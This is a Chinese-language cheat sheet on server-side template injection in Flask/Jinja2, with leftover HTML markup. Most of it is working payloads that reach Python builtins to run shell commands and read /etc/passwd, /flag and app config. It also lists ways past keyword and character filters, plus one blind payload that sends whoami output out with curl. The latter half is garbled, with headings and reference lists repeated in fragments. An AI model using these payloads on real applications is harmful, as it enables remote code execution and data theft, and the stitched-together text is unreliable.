所有类都是

type<\/code>的实例，继承自object<\/code><\/li>

支持多继承，可通过base<\/code>、mro<\/code>获取父类<\/li>

初始化时填充tp_dict<\/code>用于搜索类的方法和属性<\/li>

特殊方法（如__repr__<\/code>）默认指向slot方法，可被重写<\/li>

Python操作符（如[1:2]<\/code>）通过特殊方法实现<\/li>

方法是对PyFunctionObject<\/code>的包装，封装为PyMethodObject<\/code><\/li>
<\/ul>
Flask\/Jinja2特性<\/h3>


模板语法：<\/p>

{{ ... }}<\/code>：表达式，会渲染结果<\/li>
{% ... %}<\/code>：语句，可实现for<\/code>、if<\/code>等逻辑<\/li>
{% set %}<\/code>：变量赋值<\/li>
<\/ul>
<\/li>

重要文档：<\/p>

Jinja2内置过滤器<\/a><\/li>
Flask文档<\/a><\/li>
<\/ul>
<\/li>
<\/ul>
命令执行构造方法<\/h2>
利用Flask内置函数<\/h3>
{{url_for.<\/span>__globals__['__builtins__'<\/span>].<\/span>__import__('os'<\/span>).<\/span>system('ls'<\/span>)}}
<\/span><\/span>{{request.<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>].<\/span>open('\/flag'<\/span>).<\/span>read()}}
<\/span><\/span><\/code><\/pre>获取配置信息<\/h3>
{{config}}
<\/span><\/span>{{get_flashed_messages.<\/span>__globals__['current_app'<\/span>].<\/span>config}}
<\/span><\/span><\/code><\/pre>通过基类查找子类<\/h3>
Python 2.7:<\/p>
''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>]
<\/span><\/span>{}.<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>().<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>[].<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>request.<\/span>__class__.<\/span>__mro__[1<\/span>]
<\/span><\/span><\/code><\/pre>Python 3.7:<\/p>
''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>]
<\/span><\/span>{}.<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>().<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>[].<\/span>__class__.<\/span>__bases__[0<\/span>]
<\/span><\/span>[].<\/span>__class__.<\/span>__base__
<\/span><\/span>().<\/span>__class__.<\/span>__base__
<\/span><\/span>{}.<\/span>__class__.<\/span>__base__
<\/span><\/span>request.<\/span>__class__.<\/span>__mro__[1<\/span>]
<\/span><\/span>session.<\/span>__class__.<\/span>__mro__[1<\/span>]
<\/span><\/span>redirect.<\/span>__class__.<\/span>__mro__[1<\/span>]
<\/span><\/span><\/code><\/pre>常见Payload<\/h3>

使用__globals__<\/code>:<\/li>
<\/ol>
''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__['__builtins__'<\/span>]['eval'<\/span>]('__import__("os").popen("ls").read()'<\/span>)
<\/span><\/span><\/code><\/pre>
不使用__globals__<\/code>:<\/li>
<\/ol>
''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[60<\/span>]().<\/span>_module.<\/span>__builtins__['__import__'<\/span>]("os"<\/span>).<\/span>system("calc"<\/span>)
<\/span><\/span><\/code><\/pre>过滤绕过技术<\/h2>
前置知识<\/h3>

Python魔术方法可实现字典、数组取值操作<\/li>
Jinja2特殊处理模板，可通过A['__init__']<\/code>访问方法\/属性<\/li>
attr<\/code>过滤器可获取对象属性\/方法<\/li>
Flask内置request<\/code>对象获取请求信息：

request.args.name<\/code><\/li>
request.cookies.name<\/code><\/li>
request.headers.name<\/code><\/li>
request.values.name<\/code><\/li>
request.form.name<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
关键字过滤绕过<\/h3>


未过滤引号<\/strong>：<\/p>

使用反转或拼接：<\/li>
<\/ul>
{{''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__['__snitliub__'<\/span>[::-<\/span>1<\/span>]]['eval'<\/span>]('__import__("os").popen("ls").read()'<\/span>)}}
<\/span><\/span>
<\/span><\/span>{{''<\/span>.<\/span>__class__.<\/span>__mro__[1<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__['__buil'<\/span>+<\/span>'tins__'<\/span>[::-<\/span>1<\/span>]]['eval'<\/span>]('__import__("os").popen("ls").read()'<\/span>)}}
<\/span><\/span><\/code><\/pre><\/li>

过滤引号<\/strong>：<\/p>

通过请求参数传递：<\/li>
<\/ul>
\/\/<\/span> URL: ?<\/span>a=<\/span>eval
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__.<\/span>__builtins__.<\/span>[request.<\/span>args.<\/span>a]('__import__("os").popen("ls").read()'<\/span>)
<\/span><\/span>
<\/span><\/span>\/\/<\/span> Cookie: aa=<\/span>__class__;bb=<\/span>__mro__;cc=<\/span>__subclasses__
<\/span><\/span>{{((request|<\/span>attr(request.<\/span>cookies.<\/span>get('aa'<\/span>))|<\/span>attr(request.<\/span>cookies.<\/span>get('bb'<\/span>))|<\/span>list).<\/span>pop(-<\/span>1<\/span>))|<\/span>attr(request.<\/span>cookies.<\/span>get('cc'<\/span>))()}}
<\/span><\/span><\/code><\/pre>
拼接字符：<\/li>
<\/ul>
{{(config.<\/span>__str__()[2<\/span>])+<\/span>(config.<\/span>__str__()[3<\/span>])}}
<\/span><\/span><\/code><\/pre>
查出chr<\/code>函数并赋值：<\/li>
<\/ul>
{%<\/span> set chr=<\/span>().<\/span>__class__.<\/span>__bases__.<\/span>__getitem__(0<\/span>).<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>__globals__.<\/span>__builtins__.<\/span>chr %<\/span>}
<\/span><\/span>{{ ().<\/span>__class__.<\/span>__bases__.<\/span>__getitem__(0<\/span>).<\/span>__subclasses__().<\/span>pop(40<\/span>)(chr(47<\/span>)%<\/span>2<\/span>bchr(101<\/span>)%<\/span>2<\/span>bchr(116<\/span>)%<\/span>2<\/span>bchr(99<\/span>)%<\/span>2<\/span>bchr(47<\/span>)%<\/span>2<\/span>bchr(112<\/span>)%<\/span>2<\/span>bchr(97<\/span>)%<\/span>2<\/span>bchr(115<\/span>)%<\/span>2<\/span>bchr(115<\/span>)%<\/span>2<\/span>bchr(119<\/span>)%<\/span>2<\/span>bchr(100<\/span>)).<\/span>read() }}
<\/span><\/span><\/code><\/pre>
利用内置过滤器拼接字符：<\/li>
<\/ul>
{%<\/span>set pc =<\/span> g|<\/span>lower|<\/span>list|<\/span>first|<\/span>urlencode|<\/span>first%<\/span>}  # 获取%<\/span>
<\/span><\/span>{%<\/span>set c=<\/span>dict(c=<\/span>1<\/span>).<\/span>keys()|<\/span>reverse|<\/span>first%<\/span>}  # 获取'c'<\/span>
<\/span><\/span>{%<\/span>set udl=<\/span>dict(a=<\/span>pc,c=<\/span>c).<\/span>values()|<\/span>join %<\/span>}  # 拼接'%c'<\/span>
<\/span><\/span>{%<\/span>set udl2=<\/span>udl%<\/span>(95<\/span>)%<\/span>}{{udl}}  # 得到任意字符<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
特殊字符过滤绕过<\/h3>


过滤[<\/code><\/strong>：<\/p>

使用__getitem__<\/code>或pop<\/code>：<\/li>
<\/ul>
''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>__getitem__(2<\/span>).<\/span>__subclasses__().<\/span>pop(40<\/span>)('\/etc\/passwd'<\/span>).<\/span>read()
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>__getitem__(2<\/span>).<\/span>__subclasses__().<\/span>pop(59<\/span>).<\/span>__init__.<\/span>func_globals.<\/span>linecache.<\/span>os.<\/span>popen('ls'<\/span>).<\/span>read()
<\/span><\/span>''<\/span>.<\/span>__class__.<\/span>__mro__.<\/span>__getitem__(2<\/span>).<\/span>__subclasses__().<\/span>__getitem__(59<\/span>).<\/span>__init__.<\/span>__globals__.<\/span>__getitem__('__builtins__'<\/span>).<\/span>__getitem__('__import__'<\/span>)('os'<\/span>).<\/span>system('calc'<\/span>)
<\/span><\/span><\/code><\/pre><\/li>

过滤双花括号{{}}<\/code><\/strong>：<\/p>

使用{%%}<\/code>标记（无回显）：<\/li>
<\/ul>
{%<\/span> if<\/span> ''<\/span>.<\/span>__class__.<\/span>__mro__[2<\/span>].<\/span>__subclasses__()[59<\/span>].<\/span>__init__.<\/span>func_globals.<\/span>linecache.<\/span>os.<\/span>popen('curl http:\/\/127.0.0.1:7999\/?i=`whoami`'<\/span>).<\/span>read()==<\/span>'p'<\/span> %<\/span>}1<\/span>{%<\/span> endif %<\/span>}
<\/span><\/span><\/code><\/pre>
使用{%print%}<\/code>标记（有回显）：<\/li>
<\/ul>
{%<\/span>print config%<\/span>}
<\/span><\/span><\/code><\/pre><\/li>

过滤下划线<\/strong>：<\/p>

使用与字符串过滤相同的绕过技术<\/li>
<\/ul>
<\/li>
<\/ol>
参考资料<\/h2>

Python沙箱逃逸与SSTI<\/a><\/li>
Python沙箱逃逸小结<\/a><\/li>
Flask之SSTI模板注入<\/a><\/li>
浅析Python Flask SSTI<\/a><\/li>
Python沙箱逃逸<\/a><\/li>
Python沙箱逃逸总结<\/a><\/li>
<\/ol>

过滤绕过技术<\/h2>

参考资料<\/h2>

Python沙箱逃逸与SSTI<\/a><\/li>
Python沙箱逃逸小结<\/a><\/li>
Flask之SSTI模板注入<\/a><\/li>
浅析Python Flask SSTI<\/a><\/li>
Python沙箱逃逸<\/a><\/li>
Python沙箱逃逸总结<\/a><\/li> <\/ol>

Flask SSTI 绕过原理详解<\/h1>

前置知识<\/h2>

命令执行构造方法<\/h2>

Flask SSTI 绕过原理详解<\/h1>

前置知识<\/h2>

命令执行构造方法<\/h2>

获取配置信息<\/h3> {{config}} <\/span><\/span>{{get_flashed_messages.<\/span>__globals__['current_app'<\/span>].<\/span>config}} <\/span><\/span><\/code><\/pre>通过基类查找子类<\/h3> Python 2.7:<\/p>

通过基类查找子类<\/h3> Python 2.7:<\/p>

过滤绕过技术<\/h2>

参考资料<\/h2> Python沙箱逃逸与SSTI<\/a><\/li> Python沙箱逃逸小结<\/a><\/li> Flask之SSTI模板注入<\/a><\/li> 浅析Python Flask SSTI<\/a><\/li> Python沙箱逃逸<\/a><\/li> Python沙箱逃逸总结<\/a><\/li> <\/ol>

参考资料<\/h2>

Python沙箱逃逸与SSTI<\/a><\/li>
Python沙箱逃逸小结<\/a><\/li>
Flask之SSTI模板注入<\/a><\/li>
浅析Python Flask SSTI<\/a><\/li>
Python沙箱逃逸<\/a><\/li>
Python沙箱逃逸总结<\/a><\/li> <\/ol>